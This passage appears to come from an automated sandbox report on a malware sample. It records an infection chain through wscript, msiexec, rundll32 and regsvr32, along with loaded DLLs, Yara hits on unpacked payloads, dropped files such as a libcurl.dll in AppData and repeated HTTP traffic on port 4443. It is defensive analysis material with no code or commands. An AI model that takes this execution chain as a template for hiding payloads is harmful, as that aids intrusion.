                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

                  Data Obfuscation

                  barindex
                  Source: Yara matchFile source: 5.2.rundll32.exe.4930000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.regsvr32.exe.6b600000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.regsvr32.exe.6b600000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.6c310000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.4930000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3322347292.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\8f08\724536\724536.winmd, type: DROPPED
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB41116 push ecx; ret 5_2_7FB41129
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F80B37E push cs; retf 0002h7_2_7F80B37F
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F841116 push ecx; ret 7_2_7F841129
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F12B37E push cs; retf 0002h11_2_7F12B37F
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F161116 push ecx; ret 11_2_7F161129
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\silver\libcurl.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC41.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICCA1.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA2D.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\724536\724536.winmdJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC71.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC41.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICCA1.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA2D.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC71.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\724536\724536.winmdJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49829
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
